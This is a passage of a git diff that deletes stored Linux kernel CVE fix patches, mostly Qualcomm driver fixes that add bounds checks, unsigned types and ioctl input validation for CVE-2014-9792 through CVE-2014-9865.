-d945cb9cce20ac7143c2de8d88b187f62db99bdc (pty: Rework the pty layer to
-use the normal buffering logic) in 2.6.31-rc3.
-
-js: add more info to the commit log
-js: switch to bool
-js: lock unconditionally
-js: lock only the tty->ops->write call
-
-Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
-Signed-off-by: Jiri Slaby <jslaby@suse.cz>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-Change-Id: I9e235db6ec2bb950f26bd8a23f6145dab5dc0a15
-Git-commit: 4291086b1f081b869c6d79e5b7441633dc3ace00
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-Signed-off-by: Avijit Kanti Das <avijitnsec@codeaurora.org>
-[rsiddoji@codeaurora.org: resolve trivial merge conflicts]
-Signed-off-by: Ravi Kumar S <rsiddoji@codeaurora.org>
----
- drivers/tty/n_tty.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c
-index 8eb5573..54c46c8 100644
---- a/drivers/tty/n_tty.c
-+++ b/drivers/tty/n_tty.c
-@@ -1998,8 +1998,11 @@ static ssize_t n_tty_write(struct tty_struct *tty, struct file *file,
- 			if (tty->ops->flush_chars)
- 				tty->ops->flush_chars(tty);
- 		} else {
-+
- 			while (nr > 0) {
-+				mutex_lock(&tty->output_lock);
- 				c = tty->ops->write(tty, b, nr);
-+				mutex_unlock(&tty->output_lock);
- 				if (c < 0) {
- 					retval = c;
- 					goto break_out;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9792/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9792/ANY/0001.patch
deleted file mode 100644
index d063f53d..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9792/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From a3e3dd9fc0a2699ae053ffd3efb52cdc73ad94cd Mon Sep 17 00:00:00 2001
-From: Zaheerulla Meer <zmeer@codeaurora.org>
-Date: Fri, 11 Oct 2013 18:18:35 +0530
-Subject: msm: ipc: Possible memory corruption due to Sign Conversion
-
-msm_ipc_router_skb_to_buf() takes an unsigned argument and assigns the
-same to a signed local variable. This might cause issues when the value
-of the argument is too high.
-
-Change the datatype of the local variable to unsigned.
-
-CRs-Fixed: 550606
-Change-Id: I257a095681dd82fba05367fd6faf25820e95c719
-Signed-off-by: Zaheerulla Meer <zmeer@codeaurora.org>
----
- arch/arm/mach-msm/ipc_router.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mach-msm/ipc_router.c b/arch/arm/mach-msm/ipc_router.c
-index 9cdad6a1..cb9ad4c 100644
---- a/arch/arm/mach-msm/ipc_router.c
-+++ b/arch/arm/mach-msm/ipc_router.c
-@@ -434,7 +434,7 @@ static void *msm_ipc_router_skb_to_buf(struct sk_buff_head *skb_head,
- 				       unsigned int len)
- {
- 	struct sk_buff *temp;
--	int offset = 0, buf_len = 0, copy_len;
-+	unsigned int offset = 0, buf_len = 0, copy_len;
- 	void *buf;
- 
- 	if (!skb_head) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9803/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9803/ANY/0001.patch
deleted file mode 100644
index 408e8ea9..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9803/ANY/0001.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 5a0fdfada3a2aa50d7b947a2e958bf00cbe0d830 Mon Sep 17 00:00:00 2001
-From: Catalin Marinas <catalin.marinas@arm.com>
-Date: Fri, 16 May 2014 16:44:32 +0100
-Subject: Revert "arm64: Introduce execute-only page access permissions"
-
-This reverts commit bc07c2c6e9ed125d362af0214b6313dca180cb08.
-
-While the aim is increased security for --x memory maps, it does not
-protect against kernel level reads. Until SECCOMP is implemented for
-arm64, revert this patch to avoid giving a false idea of execute-only
-mappings.
-
-Signed-off-by: Catalin Marinas <catalin.marinas@arm.com>
----
- arch/arm64/include/asm/pgtable.h | 11 +++++------
- 1 file changed, 5 insertions(+), 6 deletions(-)
-
-(limited to 'arch/arm64/include/asm/pgtable.h')
-
-diff --git a/arch/arm64/include/asm/pgtable.h b/arch/arm64/include/asm/pgtable.h
-index e4c60d6..aa150ed 100644
---- a/arch/arm64/include/asm/pgtable.h
-+++ b/arch/arm64/include/asm/pgtable.h
-@@ -86,13 +86,12 @@ extern void __pgd_error(const char *file, int line, unsigned long val);
- #define PAGE_COPY_EXEC		__pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN)
- #define PAGE_READONLY		__pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN | PTE_UXN)
- #define PAGE_READONLY_EXEC	__pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN)
--#define PAGE_EXECONLY		__pgprot(_PAGE_DEFAULT | PTE_NG | PTE_PXN)
- 
- #define __P000  PAGE_NONE
- #define __P001  PAGE_READONLY
- #define __P010  PAGE_COPY
- #define __P011  PAGE_COPY
--#define __P100  PAGE_EXECONLY
-+#define __P100  PAGE_READONLY_EXEC
- #define __P101  PAGE_READONLY_EXEC
- #define __P110  PAGE_COPY_EXEC
- #define __P111  PAGE_COPY_EXEC
-@@ -101,7 +100,7 @@ extern void __pgd_error(const char *file, int line, unsigned long val);
- #define __S001  PAGE_READONLY
- #define __S010  PAGE_SHARED
- #define __S011  PAGE_SHARED
--#define __S100  PAGE_EXECONLY
-+#define __S100  PAGE_READONLY_EXEC
- #define __S101  PAGE_READONLY_EXEC
- #define __S110  PAGE_SHARED_EXEC
- #define __S111  PAGE_SHARED_EXEC
-@@ -137,8 +136,8 @@ extern struct page *empty_zero_page;
- #define pte_write(pte)		(!!(pte_val(pte) & PTE_WRITE))
- #define pte_exec(pte)		(!(pte_val(pte) & PTE_UXN))
- 
--#define pte_valid_ng(pte) \
--	((pte_val(pte) & (PTE_VALID | PTE_NG)) == (PTE_VALID | PTE_NG))
-+#define pte_valid_user(pte) \
-+	((pte_val(pte) & (PTE_VALID | PTE_USER)) == (PTE_VALID | PTE_USER))
- 
- static inline pte_t pte_wrprotect(pte_t pte)
- {
-@@ -192,7 +191,7 @@ extern void __sync_icache_dcache(pte_t pteval, unsigned long addr);
- static inline void set_pte_at(struct mm_struct *mm, unsigned long addr,
- 			      pte_t *ptep, pte_t pte)
- {
--	if (pte_valid_ng(pte)) {
-+	if (pte_valid_user(pte)) {
- 		if (!pte_special(pte) && pte_exec(pte))
- 			__sync_icache_dcache(pte, addr);
- 		if (pte_dirty(pte) && pte_write(pte))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9863/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9863/ANY/0001.patch
deleted file mode 100644
index 093e6eca..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9863/ANY/0001.patch
+++ /dev/null
@@ -1,123 +0,0 @@
-From 75eac48a48562f819f50eeff8369b296d89102d7 Mon Sep 17 00:00:00 2001
-From: Katish Paran <kparan@codeaurora.org>
-Date: Tue, 24 Dec 2013 17:46:29 +0530
-Subject: diag: Safeguard for bound checks and integer underflow
-
-At certain point in diag driver there can be integer underflow
-and thus can lead to memory leak. Bound checks are placed to
-ensure correct behavior of condition statements.
-
-Change-Id: I47e02f764c2c7412db6f90fd42192fee32a761d3
-CRs-fixed: 549470
-Signed-off-by: Katish Paran <kparan@codeaurora.org>
----
- drivers/char/diag/diag_debugfs.c  | 15 ++++++++-------
- drivers/char/diag/diagchar_core.c | 15 +++++++++++++--
- drivers/char/diag/diagchar_hdlc.c |  4 ++--
- 3 files changed, 23 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index 4bbe948..d63d34b 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -197,7 +197,8 @@ static ssize_t diag_dbgfs_read_dcistats(struct file *file,
- 				char __user *ubuf, size_t count, loff_t *ppos)
- {
- 	char *buf = NULL;
--	int bytes_remaining, bytes_written = 0, bytes_in_buf = 0, i = 0;
-+	unsigned int bytes_remaining, bytes_written = 0;
-+	unsigned int bytes_in_buf = 0, i = 0;
- 	struct diag_dci_data_info *temp_data = dci_data_smd;
- 	int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
- 
-@@ -353,9 +354,9 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 	char *buf;
- 	int ret = 0;
- 	int i;
--	int bytes_remaining;
--	int bytes_in_buffer = 0;
--	int bytes_written;
-+	unsigned int bytes_remaining;
-+	unsigned int bytes_in_buffer = 0;
-+	unsigned int bytes_written;
- 	int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
- 
- 	if (diag_dbgfs_table_index >= diag_max_reg) {
-@@ -526,9 +527,9 @@ static ssize_t diag_dbgfs_read_bridge(struct file *file, char __user *ubuf,
- 	char *buf;
- 	int ret;
- 	int i;
--	int bytes_remaining;
--	int bytes_in_buffer = 0;
--	int bytes_written;
-+	unsigned int bytes_remaining;
-+	unsigned int bytes_in_buffer = 0;
-+	unsigned int bytes_written;
- 	int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
- 	int bytes_hsic_inited = 45;
- 	int bytes_hsic_not_inited = 410;
-diff --git a/drivers/char/diag/diagchar_core.c b/drivers/char/diag/diagchar_core.c
-index 38ca47b..ab68902 100644
---- a/drivers/char/diag/diagchar_core.c
-+++ b/drivers/char/diag/diagchar_core.c
-@@ -51,6 +51,7 @@ MODULE_DESCRIPTION("Diag Char Driver");
- MODULE_LICENSE("GPL v2");
- MODULE_VERSION("1.0");
- 
-+#define MIN_SIZ_ALLOW 4
- #define INIT	1
- #define EXIT	-1
- struct diagchar_dev *driver;
-@@ -1461,6 +1462,10 @@ static ssize_t diagchar_write(struct file *file, const char __user *buf,
- 	index = 0;
- 	/* Get the packet type F3/log/event/Pkt response */
- 	err = copy_from_user((&pkt_type), buf, 4);
-+	if (err) {
-+		pr_alert("diag: copy failed for pkt_type\n");
-+		return -EAGAIN;
-+	}
- 	/* First 4 bytes indicate the type of payload - ignore these */
- 	if (count < 4) {
- 		pr_err("diag: Client sending short data\n");
-@@ -1504,8 +1509,9 @@ static ssize_t diagchar_write(struct file *file, const char __user *buf,
- 		return err;
- 	}
- 	if (pkt_type == CALLBACK_DATA_TYPE) {
--		if (payload_size > driver->itemsize) {
--			pr_err("diag: Dropping packet, packet payload size crosses 4KB limit. Current payload size %d\n",
-+		if (payload_size > driver->itemsize ||
-+				payload_size <= MIN_SIZ_ALLOW) {
-+			pr_err("diag: Dropping packet, invalid packet size. Current payload size %d\n",
- 				payload_size);
- 			driver->dropped_count++;
- 			return -EBADMSG;
-@@ -1639,6 +1645,11 @@ static ssize_t diagchar_write(struct file *file, const char __user *buf,
- 			diag_get_remote(*(int *)driver->user_space_data_buf);
- 
- 		if (remote_proc) {
-+			if (payload_size <= MIN_SIZ_ALLOW) {
-+				pr_err("diag: Integer underflow in %s, payload size: %d",
-+							__func__, payload_size);
-+				return -EBADMSG;
-+			}
- 			token_offset = 4;
- 			payload_size -= 4;
- 			buf += 4;
-diff --git a/drivers/char/diag/diagchar_hdlc.c b/drivers/char/diag/diagchar_hdlc.c
-index d5ba452..39f1f44 100644
---- a/drivers/char/diag/diagchar_hdlc.c
-+++ b/drivers/char/diag/diagchar_hdlc.c
-@@ -177,8 +177,8 @@ int diag_hdlc_decode(struct diag_hdlc_decode_type *hdlc)
- 	int msg_start;
- 
- 	if (hdlc && hdlc->src_ptr && hdlc->dest_ptr &&
--	    (hdlc->src_size - hdlc->src_idx > 0) &&
--	    (hdlc->dest_size - hdlc->dest_idx > 0)) {
-+	    (hdlc->src_size > hdlc->src_idx) &&
-+	    (hdlc->dest_size > hdlc->dest_idx)) {
- 
- 		msg_start = (hdlc->src_idx == 0) ? 1 : 0;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9864/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9864/ANY/0001.patch
deleted file mode 100644
index b166953a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9864/ANY/0001.patch
+++ /dev/null
@@ -1,343 +0,0 @@
-From a1124defc680055e2f2a8c8e3da4a94ca2ec842e Mon Sep 17 00:00:00 2001
-From: Mona Hossain <mhossain@codeaurora.org>
-Date: Tue, 1 Oct 2013 13:41:09 -0700
-Subject: qseecom: Add checks for API called in IOCTL
-
-Validate the caller is the right type for the IOCTL being
-issued and inputs are valid.
-
-Change-Id: Iad71f0f5ed4d53c5d011bd55cdf74ec053d09af5
-Signed-off-by: Mona Hossain <mhossain@codeaurora.org>
-Signed-off-by: Hariprasad Dhalinarasimha <hnamgund@codeaurora.org>
----
- drivers/misc/qseecom.c | 165 +++++++++++++++++++++++++++++++++++++++++++++++--
- 1 file changed, 159 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 7cc1c9f..51f0228 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -434,6 +434,12 @@ static int qseecom_set_client_mem_param(struct qseecom_dev_handle *data,
- 	if (copy_from_user(&req, (void __user *)argp, sizeof(req)))
- 		return -EFAULT;
- 
-+	if ((req.ifd_data_fd <= 0) || (req.virt_sb_base == 0) ||
-+					(req.sb_len == 0)) {
-+		pr_err("Inavlid input(s)ion_fd(%d), sb_len(%d), vaddr(0x%x)\n",
-+			req.ifd_data_fd, req.sb_len, req.virt_sb_base);
-+		return -EFAULT;
-+	}
- 	/* Get the handle of the shared fd */
- 	data->client.ihandle = ion_import_dma_buf(qseecom.ion_clnt,
- 						req.ifd_data_fd);
-@@ -2680,6 +2686,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 
- 	switch (cmd) {
- 	case QSEECOM_IOCTL_REGISTER_LISTENER_REQ: {
-+		if (data->type != QSEECOM_GENERIC) {
-+			pr_err("reg lstnr req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		pr_debug("ioctl register_listener_req()\n");
- 		atomic_inc(&data->ioctl_count);
- 		data->type = QSEECOM_LISTENER_SERVICE;
-@@ -2691,6 +2703,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_UNREGISTER_LISTENER_REQ: {
-+		if ((data->listener.id == 0) ||
-+			(data->type != QSEECOM_LISTENER_SERVICE)) {
-+			pr_err("unreg lstnr req: invalid handle (%d) lid(%d)\n",
-+						data->type, data->listener.id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		pr_debug("ioctl unregister_listener_req()\n");
- 		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_unregister_listener(data);
-@@ -2701,6 +2720,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_SEND_CMD_REQ: {
-+		if ((data->client.app_id == 0) ||
-+			(data->type != QSEECOM_CLIENT_APP)) {
-+			pr_err("send cmd req: invalid handle (%d) app_id(%d)\n",
-+					data->type, data->client.app_id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		/* Only one client allowed here at a time */
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
-@@ -2713,6 +2739,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_SEND_MODFD_CMD_REQ: {
-+		if ((data->client.app_id == 0) ||
-+			(data->type != QSEECOM_CLIENT_APP)) {
-+			pr_err("send mdfd cmd: invalid handle (%d) appid(%d)\n",
-+					data->type, data->client.app_id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		/* Only one client allowed here at a time */
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
-@@ -2725,6 +2758,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_RECEIVE_REQ: {
-+		if ((data->listener.id == 0) ||
-+			(data->type != QSEECOM_LISTENER_SERVICE)) {
-+			pr_err("receive req: invalid handle (%d), lid(%d)\n",
-+						data->type, data->listener.id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_receive_req(data);
- 		atomic_dec(&data->ioctl_count);
-@@ -2734,6 +2774,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_SEND_RESP_REQ: {
-+		if ((data->listener.id == 0) ||
-+			(data->type != QSEECOM_LISTENER_SERVICE)) {
-+			pr_err("send resp req: invalid handle (%d), lid(%d)\n",
-+						data->type, data->listener.id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_send_resp();
- 		atomic_dec(&data->ioctl_count);
-@@ -2743,7 +2790,14 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_SET_MEM_PARAM_REQ: {
--		data->type = QSEECOM_CLIENT_APP;
-+		if ((data->type != QSEECOM_CLIENT_APP) &&
-+			(data->type != QSEECOM_GENERIC) &&
-+			(data->type != QSEECOM_SECURE_SERVICE)) {
-+			pr_err("set mem param req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		pr_debug("SET_MEM_PARAM: qseecom addr = 0x%x\n", (u32)data);
- 		ret = qseecom_set_client_mem_param(data, argp);
- 		if (ret)
-@@ -2752,6 +2806,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_LOAD_APP_REQ: {
-+		if ((data->type != QSEECOM_GENERIC) &&
-+			(data->type != QSEECOM_CLIENT_APP)) {
-+			pr_err("load app req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		data->type = QSEECOM_CLIENT_APP;
- 		pr_debug("LOAD_APP_REQ: qseecom_addr = 0x%x\n", (u32)data);
- 		mutex_lock(&app_access_lock);
-@@ -2772,6 +2833,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_UNLOAD_APP_REQ: {
-+		if ((data->client.app_id == 0) ||
-+			(data->type != QSEECOM_CLIENT_APP)) {
-+			pr_err("unload app req:invalid handle(%d) app_id(%d)\n",
-+					data->type, data->client.app_id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		pr_debug("UNLOAD_APP: qseecom_addr = 0x%x\n", (u32)data);
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
-@@ -2791,6 +2859,20 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_PERF_ENABLE_REQ:{
-+		if ((data->type != QSEECOM_GENERIC) &&
-+			(data->type != QSEECOM_CLIENT_APP)) {
-+			pr_err("perf enable req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
-+		if ((data->type == QSEECOM_CLIENT_APP) &&
-+			(data->client.app_id == 0)) {
-+			pr_err("perf enable req:invalid handle(%d) appid(%d)\n",
-+					data->type, data->client.app_id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		atomic_inc(&data->ioctl_count);
- 		ret = qsee_vote_for_clock(data, CLK_DFAB);
- 		if (ret)
-@@ -2802,13 +2884,33 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_PERF_DISABLE_REQ:{
-+		if ((data->type != QSEECOM_SECURE_SERVICE) &&
-+			(data->type != QSEECOM_CLIENT_APP)) {
-+			pr_err("perf disable req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
-+		if ((data->type == QSEECOM_CLIENT_APP) &&
-+			(data->client.app_id == 0)) {
-+			pr_err("perf disable: invalid handle (%d)app_id(%d)\n",
-+					data->type, data->client.app_id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		atomic_inc(&data->ioctl_count);
--		qsee_disable_clock_vote(data, CLK_DFAB);
--		qsee_disable_clock_vote(data, CLK_SFPB);
-+			qsee_disable_clock_vote(data, CLK_DFAB);
-+			qsee_disable_clock_vote(data, CLK_SFPB);
- 		atomic_dec(&data->ioctl_count);
- 		break;
- 	}
- 	case QSEECOM_IOCTL_LOAD_EXTERNAL_ELF_REQ: {
-+		if (data->type != QSEECOM_GENERIC) {
-+			pr_err("load ext elf req: invalid client handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		data->type = QSEECOM_UNAVAILABLE_CLIENT_APP;
- 		data->released = true;
- 		mutex_lock(&app_access_lock);
-@@ -2821,6 +2923,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_UNLOAD_EXTERNAL_ELF_REQ: {
-+		if (data->type != QSEECOM_UNAVAILABLE_CLIENT_APP) {
-+			pr_err("unload ext elf req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		data->released = true;
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
-@@ -2842,9 +2950,15 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_SEND_CMD_SERVICE_REQ: {
-+		if (data->type != QSEECOM_GENERIC) {
-+			pr_err("send cmd svc req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		data->type = QSEECOM_SECURE_SERVICE;
- 		if (qseecom.qsee_version < QSEE_VERSION_03) {
--			pr_err("SEND_CMD_SERVICE_REQ: Invalid qsee version %u\n",
-+			pr_err("SEND_CMD_SERVICE_REQ: Invalid qsee ver %u\n",
- 				qseecom.qsee_version);
- 			return -EINVAL;
- 		}
-@@ -2856,8 +2970,14 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_CREATE_KEY_REQ: {
-+		if (data->type != QSEECOM_GENERIC) {
-+			pr_err("create key req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		if (qseecom.qsee_version < QSEE_VERSION_05) {
--			pr_err("Create Key feature not supported in qsee version %u\n",
-+			pr_err("Create Key feature unsupported: qsee ver %u\n",
- 				qseecom.qsee_version);
- 			return -EINVAL;
- 		}
-@@ -2873,8 +2993,14 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_WIPE_KEY_REQ: {
-+		if (data->type != QSEECOM_GENERIC) {
-+			pr_err("wipe key req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		if (qseecom.qsee_version < QSEE_VERSION_05) {
--			pr_err("Wipe Key feature not supported in qsee version %u\n",
-+			pr_err("Wipe Key feature unsupported in qsee ver %u\n",
- 				qseecom.qsee_version);
- 			return -EINVAL;
- 		}
-@@ -2889,6 +3015,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_SAVE_PARTITION_HASH_REQ: {
-+		if (data->type != QSEECOM_GENERIC) {
-+			pr_err("save part hash req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		data->released = true;
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
-@@ -2898,6 +3030,12 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_IS_ES_ACTIVATED_REQ: {
-+		if (data->type != QSEECOM_GENERIC) {
-+			pr_err("ES activated req: invalid handle (%d)\n",
-+								data->type);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		data->released = true;
- 		mutex_lock(&app_access_lock);
- 		atomic_inc(&data->ioctl_count);
-@@ -2907,6 +3045,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_SEND_MODFD_RESP: {
-+		if ((data->listener.id == 0) ||
-+			(data->type != QSEECOM_LISTENER_SERVICE)) {
-+			pr_err("receive req: invalid handle (%d), lid(%d)\n",
-+						data->type, data->listener.id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		/* Only one client allowed here at a time */
- 		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_send_modfd_resp(data, argp);
-@@ -2917,6 +3062,13 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	case QSEECOM_IOCTL_UNPROTECT_BUF: {
-+		if ((data->listener.id == 0) ||
-+			(data->type != QSEECOM_LISTENER_SERVICE)) {
-+			pr_err("receive req: invalid handle (%d), lid(%d)\n",
-+						data->type, data->listener.id);
-+			ret = -EINVAL;
-+			break;
-+		}
- 		/* Only one client allowed here at a time */
- 		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_unprotect_buffer(argp);
-@@ -2927,6 +3079,7 @@ static long qseecom_ioctl(struct file *file, unsigned cmd,
- 		break;
- 	}
- 	default:
-+		pr_err("Invalid IOCTL: %d\n", cmd);
- 		return -EINVAL;
- 	}
- 	return ret;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9865/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9865/ANY/0001.patch
deleted file mode 100644
index a59ebe13..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9865/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From e65a876a155de945e306f2726f3a557415e6044e Mon Sep 17 00:00:00 2001
-From: Mona Hossain <mhossain@codeaurora.org>
-Date: Tue, 1 Oct 2013 14:08:20 -0700
-Subject: qseecom:  Validate inputs from user space
-
-Validate send_cmd, send_modfd_cmd and send_mdfd_resp
-input parameters: cmd and response pointers and buffer
-lengths and offsets  issued to modify data.
-
-Change-Id: I381836d08aaa48357486fbdc6a122eb5b42bfa0b
-Signed-off-by: Mona Hossain <mhossain@codeaurora.org>
----
- drivers/misc/qseecom.c | 35 +++++++++++++++++++++++++++++++++--
- 1 file changed, 33 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 4c1943b..97f3362 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1134,9 +1134,22 @@ static int __qseecom_send_cmd(struct qseecom_dev_handle *data,
- 		pr_err("cmd buffer or response buffer is null\n");
- 		return -EINVAL;
- 	}
-+	if (((uint32_t)req->cmd_req_buf < data->client.user_virt_sb_base) ||
-+		((uint32_t)req->cmd_req_buf >= (data->client.user_virt_sb_base +
-+					data->client.sb_length))) {
-+		pr_err("cmd buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
-+
-+
-+	if (((uint32_t)req->resp_buf < data->client.user_virt_sb_base)  ||
-+		((uint32_t)req->resp_buf >= (data->client.user_virt_sb_base +
-+					data->client.sb_length))){
-+		pr_err("response buffer address not within shared bufffer\n");
-+		return -EINVAL;
-+	}
- 
--	if (req->cmd_req_len <= 0 ||
--		req->resp_len <= 0 ||
-+	if ((req->cmd_req_len == 0) || (req->resp_len == 0) ||
- 		req->cmd_req_len > data->client.sb_length ||
- 		req->resp_len > data->client.sb_length) {
- 		pr_err("cmd buffer length or "
-@@ -1371,6 +1384,7 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- 					void __user *argp)
- {
- 	int ret = 0;
-+	int i;
- 	struct qseecom_send_modfd_cmd_req req;
- 	struct qseecom_send_cmd_req send_cmd_req;
- 
-@@ -1384,6 +1398,14 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- 	send_cmd_req.resp_buf = req.resp_buf;
- 	send_cmd_req.resp_len = req.resp_len;
- 
-+	/* validate offsets */
-+	for (i = 0; i < MAX_ION_FD; i++) {
-+		if (req.ifd_data[i].cmd_buf_offset >= req.cmd_req_len) {
-+			pr_err("Invalid offset %d = 0x%x\n",
-+				i, req.ifd_data[i].cmd_buf_offset);
-+			return -EINVAL;
-+		}
-+	}
- 	ret = __qseecom_update_cmd_buf(&req, false, data, false);
- 	if (ret)
- 		return ret;
-@@ -2001,11 +2023,20 @@ static int qseecom_send_modfd_resp(struct qseecom_dev_handle *data,
- 						void __user *argp)
- {
- 	struct qseecom_send_modfd_listener_resp resp;
-+	int i;
- 
- 	if (copy_from_user(&resp, argp, sizeof(resp))) {
- 		pr_err("copy_from_user failed");
- 		return -EINVAL;
- 	}
-+	/* validate offsets */
-+	for (i = 0; i < MAX_ION_FD; i++) {
-+		if (resp.ifd_data[i].cmd_buf_offset >= resp.resp_len) {
-+			pr_err("Invalid offset %d = 0x%x\n",
-+				i, resp.ifd_data[i].cmd_buf_offset);
-+			return -EINVAL;
-+		}
-+	}
- 	__qseecom_update_cmd_buf(&resp, false, data, true);
- 	qseecom.send_resp_flag = 1;
- 	wake_up_interruptible(&qseecom.send_resp_wq);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9866/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9866/ANY/0001.patch
deleted file mode 100644
index cd2c9791..00000000
